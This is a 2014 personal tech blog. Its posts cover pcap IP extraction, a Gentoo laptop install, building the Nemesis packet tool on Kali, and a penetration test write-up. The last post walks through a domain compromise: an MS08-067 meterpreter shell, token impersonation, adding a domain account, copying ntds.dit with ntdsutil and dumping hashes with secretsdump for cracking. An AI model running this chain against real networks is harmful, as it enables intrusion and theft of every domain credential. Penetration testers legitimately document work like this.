Tuesday, November 18, 2014

extracting-public-ip-from-pcap

Came across a situation that required to extract all public IP address from huge traffic capture file.

The following method adopted for managing the task for saving time

File Name : extracted-traffic.pcapng

tcpdump -n -r extracted-traffic.pcapng | awk '{print $3}' | awk -F"." '{print $1"."$2"."$3"."$4}' | sort | uniq  > ip-extracted

Used the following python script to extract public IP from the ip-extracted

#!/bin/python
from IPy import IP
f = open('
public-ip-list.txt','w')
with open('ip-extracted') as fp:
    for line in fp:
     ip=IP(line)
        if ip.iptype() is "PUBLIC":
        f.write(line)
f.close()

Final IP list : - public-ip-list.txt

Tuesday, November 11, 2014

Gentoo-Lenovo-ThinkpadT440p

At last ... I made it on ThinkPad T440p ....

Followed the same way -
Handbook
https://www.gentoo.org/doc/en/handbook/handbook-amd64.xml

X-Org
http://wiki.gentoo.org/wiki/Xorg/Configuration

LXDE
http://wiki.gentoo.org/wiki/LXDE

Audio
http://wiki.gentoo.org/wiki/PulseAudio
http://wiki.gentoo.org/wiki/ALSA

My running kernel is 3.16.5
Tried with 3.17.1 but vmware and vmplayer not properly getting compiled -- need some patch - so I went back to 3.16.5 kernel.
Vmware workstation works super great...

lspci

00:00.0 Host bridge: Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller (rev 06)
00:02.0 VGA compatible controller: Intel Corporation 4th Gen Core Processor Integrated Graphics Controller (rev 06)
00:03.0 Audio device: Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller (rev 06)
00:14.0 USB controller: Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI (rev 04)
00:16.0 Communication controller: Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1 (rev 04)
00:19.0 Ethernet controller: Intel Corporation Ethernet Connection I217-LM (rev 04)
00:1b.0 Audio device: Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller (rev 04)
00:1c.0 PCI bridge: Intel Corporation 8 Series/C220 Series Chipset Family PCI Express Root Port #1 (rev d4)
00:1c.1 PCI bridge: Intel Corporation 8 Series/C220 Series Chipset Family PCI Express Root Port #2 (rev d4)
00:1d.0 USB controller: Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1 (rev 04)
00:1f.0 ISA bridge: Intel Corporation QM87 Express LPC Controller (rev 04)
00:1f.2 SATA controller: Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode] (rev 04)
00:1f.3 SMBus: Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller (rev 04)
02:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader (rev 01)
03:00.0 Network controller: Intel Corporation Wireless 7260 (rev 6b)

lsusb

Bus 001 Device 002: ID 8087:8000 Intel Corp.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 005: ID 138a:0017 Validity Sensors, Inc.
Bus 002 Device 004: ID 046d:c534 Logitech, Inc. Unifying Receiver
Bus 002 Device 003: ID 058f:9540 Alcor Micro Corp. AU9540 Smartcard Reader
Bus 002 Device 007: ID 04f2:b39a Chicony Electronics Co., Ltd
Bus 002 Device 006: ID 8087:07dc Intel Corp.
Bus 002 Device 002: ID 0bb4:0001 HTC (High Tech Computer Corp.)
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub






Wednesday, October 29, 2014

Kali-nemesis-libnet

Installation of Nemesis on Kali Linux

Nemesis -> http://nemesis.sourceforge.net/

Dependencies
apt-get install libdnet-dev
apt-get install libpcap-dev

Libnet- > wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz

tar zxvf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a/
./configure 
make

To avoid an error we should edit Makefile
Complete the following path variable entry in Makefie otherwise there will be an error like
./install-sh include/libnet/libnet-macros.h /usr/include/libnet
./install-sh include/libnet/libnet-asn1.h /usr/include/libnet
./install-sh include/libnet/libnet-ospf.h /usr/include/libnet
./install-sh doc/libnet.3
install:    no destination specified
make: *** [install] Error 1

 
MAN_PREFIX  =   /usr/share/doc/


Then 
 
# make install















Friday, October 24, 2014

Enterprise-Security-A-Complete-Internal-Compromise

This post is about an Internal Vulnerability Assessment and Penetration Testing for an Enterprise. Every time I do similar project thought of creating a post for the same for my own reference... At last now is the time for the same....
Enterprise:-
Yes.. More than 1500 Users ...
More than 100 Servers...
Firewalls...
Routers ...
Proxy...
VOIP...
Bio...
IT...
I...

My favorite fingering printing command for a Windows Environment --
nmap -p445 --script=smb-os-discovery xxx.xxx.x.x/xx

Ran a Nessus for Desktop range of IP address - Surprisingly all of them are shown as good ! Except RDP MiTM, SSL and SMB signing. !

Continued the Nessus to Server Ranges at Head quarter's -- Same result ! !

Continued the Nessus to Servers at Branch offices ....

Except one 2003 Server - all others are shown Same !!!

There comes the God's last fingerprint - what is that Critical Red Color - Yes it is the very old largely exploited and demonstrated same peace of bug for evergreen  Microsoft - MS08-067!

No more explanation required here at all - Yes there comes the first reverse metapreter shell !

meterpreter > use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
<DOMAIN_NAME REMOVED>\backupuser



meterpreter > impersonate_token DOMAIN\\backupuser
[-] No delegation token available
[+] Successfully impersonated user
DOMAIN\\backupuser
 meterpreter > getuid
Server username:
DOMAIN\\backupuser
meterpreter > execute -f cmd.exe -i -t
Process 3712 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
DOMAIN\\backupuser

There comes a user from the Domain. Next created a user on the Domain.

C:\WINDOWS\system32>net user pentest password-not-now /add /domain
net user pentest password-not-now /add /domain
The request will be processed at a domain controller for domain DOMAIN.

Luckily the backupuser user was having privilege to create a user on ADC and add him to the domain admins group, etc.

Connected to the Primary Domain Controller with RDP !!
At Command :-
C:\> ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to "NTDS".
snapshot: list all
No snapshots found.
snapshot: create
Creating snapshot...
Snapshot set {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} generated successfully.
snapshot: list all
1: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXxxxx
2: C:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
snapshot: mount 2
Snapshot {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} mounted as C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\

Downloaded the ntds.dt file from
C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\Windows\NTDS\

Created a a copy of System hive from Registry 
reg.exe save HKLM\SYSTEM c:\pentest.system
Downloaded the same file too..

Files downloaded from PDC
167M    ntds.dit
8.9M     pentest.system

Used secretsdump.py for extracting usernames and hashes 
#secretsdump.py -system pentest.system -ntds ntds.dit LOCAL

The resulted file was having more than 3000 lines !!!
crack station password list was able to get up to 50 passwords for half of the hashes and 20% of the users are using same password !
***Cracking the hashes are not allowed in all organizations- so make sure before cracking the passwords that this action is not denied by their policy**